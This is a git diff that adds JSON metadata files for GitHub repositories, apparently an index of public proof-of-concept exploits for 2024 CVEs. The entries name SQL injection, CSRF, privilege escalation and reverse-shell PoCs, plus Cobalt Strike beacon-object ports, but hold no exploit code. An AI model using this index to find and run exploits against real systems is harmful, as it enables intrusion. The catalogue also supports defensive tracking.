"subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34739.json b/2024/CVE-2024-34739.json new file mode 100644 index 0000000000..90e76cc9a7 --- /dev/null +++ b/2024/CVE-2024-34739.json @@ -0,0 +1,33 @@ +[ + { + "id": 867557806, + "name": "CVE-2024-34739", + "full_name": "uthrasri\/CVE-2024-34739", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-34739", + "description": null, + "fork": false, + "created_at": "2024-10-04T09:40:59Z", + "updated_at": "2024-10-04T09:43:47Z", + "pushed_at": "2024-10-04T09:43:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34741.json b/2024/CVE-2024-34741.json new file mode 100644 index 0000000000..24e3880dac --- /dev/null +++ b/2024/CVE-2024-34741.json @@ -0,0 +1,33 @@ +[ + { + "id": 867664225, + "name": "CVE-2024-34741", + "full_name": "uthrasri\/CVE-2024-34741", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-34741", + "description": null, + "fork": false, + "created_at": "2024-10-04T13:41:09Z", + "updated_at": "2024-10-04T13:44:01Z", + "pushed_at": "2024-10-04T13:44:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34831.json b/2024/CVE-2024-34831.json new file mode 100644 index 0000000000..7d13c807a5 --- /dev/null +++ b/2024/CVE-2024-34831.json @@ -0,0 +1,33 @@ +[ + { + "id": 854315476, + "name": "CVE-2024-34831", + "full_name": "enzored\/CVE-2024-34831", + "owner": { + "login": "enzored", + "id": 4228172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4228172?v=4", + "html_url": "https:\/\/github.com\/enzored", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enzored\/CVE-2024-34831", + "description": "Disclosure of CVE-2024-34831", + "fork": false, + "created_at": "2024-09-08T23:58:09Z", + "updated_at": "2024-09-17T14:29:52Z", + "pushed_at": "2024-09-17T14:29:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34832.json b/2024/CVE-2024-34832.json new file mode 100644 index 0000000000..ca2fda25e3 --- /dev/null +++ b/2024/CVE-2024-34832.json @@ -0,0 +1,33 @@ +[ + { + "id": 800669988, + "name": "CVE-2024-34832", + "full_name": "julio-cfa\/CVE-2024-34832", + "owner": { + "login": "julio-cfa", + "id": 52619625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52619625?v=4", + "html_url": "https:\/\/github.com\/julio-cfa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julio-cfa\/CVE-2024-34832", + "description": "CVE-2024-34832", + "fork": false, + "created_at": "2024-05-14T19:15:31Z", + "updated_at": "2024-06-03T10:42:47Z", + "pushed_at": "2024-06-03T10:42:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34833.json b/2024/CVE-2024-34833.json new file mode 100644 index 0000000000..2f62866130 --- /dev/null +++ b/2024/CVE-2024-34833.json @@ -0,0 +1,33 @@ +[ + { + "id": 794975780, + "name": "CVE-2024-34833-payroll-management-system-rce", + "full_name": "ShellUnease\/CVE-2024-34833-payroll-management-system-rce", + "owner": { + "login": "ShellUnease", + "id": 145274712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145274712?v=4", + "html_url": "https:\/\/github.com\/ShellUnease", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShellUnease\/CVE-2024-34833-payroll-management-system-rce", + "description": null, + "fork": false, + "created_at": "2024-05-02T10:37:56Z", + "updated_at": "2024-08-11T21:59:37Z", + "pushed_at": "2024-08-11T21:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3495.json b/2024/CVE-2024-3495.json new file mode 100644 index 0000000000..29bad07899 --- /dev/null +++ b/2024/CVE-2024-3495.json @@ -0,0 +1,64 @@ +[ + { + "id": 804659512, + "name": "CVE-2024-3495-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3495-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3495-Poc", + "description": "CVE-2024-3495 Country State City Dropdown CF7 <= 2.7.2 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-23T02:41:15Z", + "updated_at": "2024-08-05T05:08:13Z", + "pushed_at": "2024-05-24T15:27:43Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806847761, + "name": "CVE-2024-3495-POC", + "full_name": "zomasec\/CVE-2024-3495-POC", + "owner": { + "login": "zomasec", + "id": 118324667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118324667?v=4", + "html_url": "https:\/\/github.com\/zomasec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zomasec\/CVE-2024-3495-POC", + "description": "The Country State City Dropdown CF7 WordPress plugin (versions up to 2.7.2) is vulnerable to SQL Injection via 'cnt' and 'sid' parameters. Insufficient escaping and lack of preparation in the SQL query allow unauthenticated attackers to append queries, potentially extracting sensitive database information.", + "fork": false, + "created_at": "2024-05-28T02:57:12Z", + "updated_at": "2024-07-03T11:41:08Z", + "pushed_at": "2024-05-28T02:57:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34958.json b/2024/CVE-2024-34958.json new file mode 100644 index 0000000000..dc9bf47262 --- /dev/null +++ b/2024/CVE-2024-34958.json @@ -0,0 +1,33 @@ +[ + { + "id": 803178565, + "name": "CVE-2024-34958", + "full_name": "Gr-1m\/CVE-2024-34958", + "owner": { + "login": "Gr-1m", + "id": 57427356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57427356?v=4", + "html_url": "https:\/\/github.com\/Gr-1m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gr-1m\/CVE-2024-34958", + "description": "idccms CSRF poc", + "fork": false, + "created_at": "2024-05-20T08:15:05Z", + "updated_at": "2024-06-03T04:59:09Z", + "pushed_at": "2024-06-03T04:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35133.json b/2024/CVE-2024-35133.json new file mode 100644 index 0000000000..7a3f4a5b6e --- /dev/null +++ b/2024/CVE-2024-35133.json @@ -0,0 +1,33 @@ +[ + { + "id": 874697408, + "name": "Ozozuz-IBM-Security-Verify-CVE-2024-35133", + "full_name": "Ozozuz\/Ozozuz-IBM-Security-Verify-CVE-2024-35133", + "owner": { + "login": "Ozozuz", + "id": 32651700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32651700?v=4", + "html_url": "https:\/\/github.com\/Ozozuz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ozozuz\/Ozozuz-IBM-Security-Verify-CVE-2024-35133", + "description": "Security Bulletin for CVE-2024-35133 - With PoC", + "fork": false, + "created_at": "2024-10-18T09:49:27Z", + "updated_at": "2024-10-21T09:48:43Z", + "pushed_at": "2024-10-18T09:50:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35205.json b/2024/CVE-2024-35205.json new file mode 100644 index 0000000000..d4311f808b --- /dev/null +++ b/2024/CVE-2024-35205.json @@ -0,0 +1,33 @@ +[ + { + "id": 816188632, + "name": "Dirty_Stream-Android-POC", + "full_name": "cyb3r-w0lf\/Dirty_Stream-Android-POC", + "owner": { + "login": "cyb3r-w0lf", + "id": 63139650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63139650?v=4", + "html_url": "https:\/\/github.com\/cyb3r-w0lf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyb3r-w0lf\/Dirty_Stream-Android-POC", + "description": "Dirty Stream exploit for MI-File Explorer V1-210567 version. CVE-2024-35205", + "fork": false, + "created_at": "2024-06-17T08:10:47Z", + "updated_at": "2024-10-23T00:23:30Z", + "pushed_at": "2024-09-30T09:06:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35242.json b/2024/CVE-2024-35242.json new file mode 100644 index 0000000000..70959de644 --- /dev/null +++ b/2024/CVE-2024-35242.json @@ -0,0 +1,33 @@ +[ + { + "id": 829004547, + "name": "CVE-2024-35242", + "full_name": "KKkai0315\/CVE-2024-35242", + "owner": { + "login": "KKkai0315", + "id": 113790723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113790723?v=4", + "html_url": "https:\/\/github.com\/KKkai0315", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KKkai0315\/CVE-2024-35242", + "description": "A test repository for the vulnerability CVE-2024-35242's PoC", + "fork": false, + "created_at": "2024-07-15T15:01:31Z", + "updated_at": "2024-07-15T15:02:09Z", + "pushed_at": "2024-07-16T03:39:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35250.json b/2024/CVE-2024-35250.json new file mode 100644 index 0000000000..e9695aa992 --- /dev/null +++ b/2024/CVE-2024-35250.json @@ -0,0 +1,99 @@ +[ + { + "id": 872102343, + "name": "CVE-2024-35250", + "full_name": "varwara\/CVE-2024-35250", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-35250", + "description": "PoC for the Untrusted Pointer Dereference in the ks.sys driver", + "fork": false, + "created_at": "2024-10-13T19:30:20Z", + "updated_at": "2024-11-27T06:42:50Z", + "pushed_at": "2024-11-26T20:54:17Z", + "stargazers_count": 211, + "watchers_count": 211, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 211, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 878394797, + "name": "CVE-2024-35250-BOF", + "full_name": "ro0tmylove\/CVE-2024-35250-BOF", + "owner": { + "login": "ro0tmylove", + "id": 87022727, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87022727?v=4", + "html_url": "https:\/\/github.com\/ro0tmylove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ro0tmylove\/CVE-2024-35250-BOF", + "description": "Cobalt Strike 的 CVE-2024-35250 的 BOF。(请给我加个星,谢谢。) ", + "fork": false, + "created_at": "2024-10-25T10:06:09Z", + "updated_at": "2024-11-28T07:35:54Z", + "pushed_at": "2024-10-21T04:15:27Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 893053192, + "name": "CVE-2024-35250-BOF", + "full_name": "yinsel\/CVE-2024-35250-BOF", + "owner": { + "login": "yinsel", + "id": 91541985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91541985?v=4", + "html_url": "https:\/\/github.com\/yinsel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yinsel\/CVE-2024-35250-BOF", + "description": "CVE-2024-35250 的 Beacon Object File (BOF) 实现。", + "fork": false, + "created_at": "2024-11-23T12:12:00Z", + "updated_at": "2024-11-28T09:23:39Z", + "pushed_at": "2024-11-28T09:23:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobalt-strike", + "cve-2024-35250", + "cve-2024-35250-bof" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35315.json b/2024/CVE-2024-35315.json new file mode 100644 index 0000000000..442556c4db --- /dev/null +++ b/2024/CVE-2024-35315.json @@ -0,0 +1,33 @@ +[ + { + "id": 809831418, + "name": "CVE-2024-35315-POC", + "full_name": "ewilded\/CVE-2024-35315-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-35315-POC", + "description": "Mitel Collab Local Privilege Escalation CVE-2024-35315 PoC", + "fork": false, + "created_at": "2024-06-03T14:29:35Z", + "updated_at": "2024-06-03T14:31:39Z", + "pushed_at": "2024-06-03T14:31:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35333.json b/2024/CVE-2024-35333.json new file mode 100644 index 0000000000..2415d2a085 --- /dev/null +++ b/2024/CVE-2024-35333.json @@ -0,0 +1,33 @@ +[ + { + "id": 800500812, + "name": "CVE-2024-35333", + "full_name": "momo1239\/CVE-2024-35333", + "owner": { + "login": "momo1239", + "id": 34490185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34490185?v=4", + "html_url": "https:\/\/github.com\/momo1239", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momo1239\/CVE-2024-35333", + "description": null, + "fork": false, + "created_at": "2024-05-14T13:02:36Z", + "updated_at": "2024-05-28T17:36:58Z", + "pushed_at": "2024-05-28T17:36:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35468.json b/2024/CVE-2024-35468.json new file mode 100644 index 0000000000..d05820b195 --- /dev/null +++ b/2024/CVE-2024-35468.json @@ -0,0 +1,33 @@ +[ + { + "id": 799070356, + "name": "CVE-2024-35468", + "full_name": "dovankha\/CVE-2024-35468", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-35468", + "description": "CVE-2024-35468 | SQL injection", + "fork": false, + "created_at": "2024-05-11T05:23:41Z", + "updated_at": "2024-05-30T04:14:44Z", + "pushed_at": "2024-05-30T03:55:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35469.json b/2024/CVE-2024-35469.json new file mode 100644 index 0000000000..cf9a305c77 --- /dev/null +++ b/2024/CVE-2024-35469.json @@ -0,0 +1,33 @@ +[ + { + "id": 799102410, + "name": "CVE-2024-35469", + "full_name": "dovankha\/CVE-2024-35469", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-35469", + "description": "CVE-2024-35469 | SQL injection", + "fork": false, + "created_at": "2024-05-11T07:27:31Z", + "updated_at": "2024-05-31T02:59:54Z", + "pushed_at": "2024-05-30T03:59:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35475.json b/2024/CVE-2024-35475.json new file mode 100644 index 0000000000..f01374d9b8 --- /dev/null +++ b/2024/CVE-2024-35475.json @@ -0,0 +1,33 @@ +[ + { + "id": 804405352, + "name": "CVE-2024-35475", + "full_name": "carsonchan12345\/CVE-2024-35475", + "owner": { + "login": "carsonchan12345", + "id": 44266907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44266907?v=4", + "html_url": "https:\/\/github.com\/carsonchan12345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carsonchan12345\/CVE-2024-35475", + "description": null, + "fork": false, + "created_at": "2024-05-22T14:21:48Z", + "updated_at": "2024-05-22T14:23:45Z", + "pushed_at": "2024-05-22T14:23:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35511.json b/2024/CVE-2024-35511.json new file mode 100644 index 0000000000..d9f48921da --- /dev/null +++ b/2024/CVE-2024-35511.json @@ -0,0 +1,33 @@ +[ + { + "id": 805787755, + "name": "CVE-2024-35511", + "full_name": "efekaanakkar\/CVE-2024-35511", + "owner": { + "login": "efekaanakkar", + "id": 130908672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130908672?v=4", + "html_url": "https:\/\/github.com\/efekaanakkar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efekaanakkar\/CVE-2024-35511", + "description": "Men Salon Management System Using PHP and MySQL", + "fork": false, + "created_at": "2024-05-25T13:07:35Z", + "updated_at": "2024-05-25T22:53:35Z", + "pushed_at": "2024-05-25T22:44:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3552.json b/2024/CVE-2024-3552.json new file mode 100644 index 0000000000..fe8df3326b --- /dev/null +++ b/2024/CVE-2024-3552.json @@ -0,0 +1,33 @@ +[ + { + "id": 806641901, + "name": "CVE-2024-3552-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3552-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3552-Poc", + "description": "CVE-2024-3552 Web Directory Free <= 1.6.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-27T15:36:24Z", + "updated_at": "2024-06-26T12:03:23Z", + "pushed_at": "2024-05-28T10:25:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35538.json b/2024/CVE-2024-35538.json new file mode 100644 index 0000000000..31df07eb7a --- /dev/null +++ b/2024/CVE-2024-35538.json @@ -0,0 +1,33 @@ +[ + { + "id": 844197058, + "name": "Typecho-Multiple-Vulnerabilities", + "full_name": "cyberaz0r\/Typecho-Multiple-Vulnerabilities", + "owner": { + "login": "cyberaz0r", + "id": 35109470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35109470?v=4", + "html_url": "https:\/\/github.com\/cyberaz0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberaz0r\/Typecho-Multiple-Vulnerabilities", + "description": "Exploits for Typecho CVE-2024-35538, CVE-2024-35539 and CVE-2024-35540", + "fork": false, + "created_at": "2024-08-18T17:09:05Z", + "updated_at": "2024-08-20T01:34:44Z", + "pushed_at": "2024-08-18T19:37:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35584.json b/2024/CVE-2024-35584.json new file mode 100644 index 0000000000..58bc90b390 --- /dev/null +++ b/2024/CVE-2024-35584.json @@ -0,0 +1,33 @@ +[ + { + "id": 872579006, + "name": "CVE-2024-35584", + "full_name": "whwhwh96\/CVE-2024-35584", + "owner": { + "login": "whwhwh96", + "id": 42708408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42708408?v=4", + "html_url": "https:\/\/github.com\/whwhwh96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whwhwh96\/CVE-2024-35584", + "description": "OpenSIS SQLi Injection", + "fork": false, + "created_at": "2024-10-14T17:24:01Z", + "updated_at": "2024-10-28T19:27:47Z", + "pushed_at": "2024-10-14T17:42:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3596.json b/2024/CVE-2024-3596.json new file mode 100644 index 0000000000..9057fbfaf3 --- /dev/null +++ b/2024/CVE-2024-3596.json @@ -0,0 +1,33 @@ +[ + { + "id": 826482682, + "name": "CVE-2024-3596-Detector", + "full_name": "alperenugurlu\/CVE-2024-3596-Detector", + "owner": { + "login": "alperenugurlu", + "id": 64872731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64872731?v=4", + "html_url": "https:\/\/github.com\/alperenugurlu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alperenugurlu\/CVE-2024-3596-Detector", + "description": null, + "fork": false, + "created_at": "2024-07-09T19:44:40Z", + "updated_at": "2024-11-04T12:09:42Z", + "pushed_at": "2024-07-09T20:21:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36079.json b/2024/CVE-2024-36079.json new file mode 100644 index 0000000000..e9387b9565 --- /dev/null +++ b/2024/CVE-2024-36079.json @@ -0,0 +1,33 @@ +[ + { + "id": 803520695, + "name": "vaultize_CVE-2024-36079", + "full_name": "DxRvs\/vaultize_CVE-2024-36079", + "owner": { + "login": "DxRvs", + "id": 65038265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65038265?v=4", + "html_url": "https:\/\/github.com\/DxRvs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DxRvs\/vaultize_CVE-2024-36079", + "description": null, + "fork": false, + "created_at": "2024-05-20T22:07:41Z", + "updated_at": "2024-05-24T17:11:40Z", + "pushed_at": "2024-05-24T17:11:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36104.json b/2024/CVE-2024-36104.json new file mode 100644 index 0000000000..324a3892a6 --- /dev/null +++ b/2024/CVE-2024-36104.json @@ -0,0 +1,33 @@ +[ + { + "id": 816184138, + "name": "CVE-2024-36104", + "full_name": "ggfzx\/CVE-2024-36104", + "owner": { + "login": "ggfzx", + "id": 86279656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4", + "html_url": "https:\/\/github.com\/ggfzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-36104", + "description": null, + "fork": false, + "created_at": "2024-06-17T07:57:58Z", + "updated_at": "2024-06-18T05:59:22Z", + "pushed_at": "2024-06-17T08:01:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36401.json b/2024/CVE-2024-36401.json new file mode 100644 index 0000000000..d126610c93 --- /dev/null +++ b/2024/CVE-2024-36401.json @@ -0,0 +1,505 @@ +[ + { + "id": 824152890, + "name": "CVE-2024-36401", + "full_name": "bigb0x\/CVE-2024-36401", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36401", + "description": "POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.", + "fork": false, + "created_at": "2024-07-04T13:19:47Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-04T19:18:04Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 33, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824386148, + "name": "CVE-2024-36401", + "full_name": "Niuwoo\/CVE-2024-36401", + "owner": { + "login": "Niuwoo", + "id": 57100441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57100441?v=4", + "html_url": "https:\/\/github.com\/Niuwoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Niuwoo\/CVE-2024-36401", + "description": "POC", + "fork": false, + "created_at": "2024-07-05T03:02:30Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-05T03:05:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824643210, + "name": "CVE-2024-36401", + "full_name": "RevoltSecurities\/CVE-2024-36401", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": 